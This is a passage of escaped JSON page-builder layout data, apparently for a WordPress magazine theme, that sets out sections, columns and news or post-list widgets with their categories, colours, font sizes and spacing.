li8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"7\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba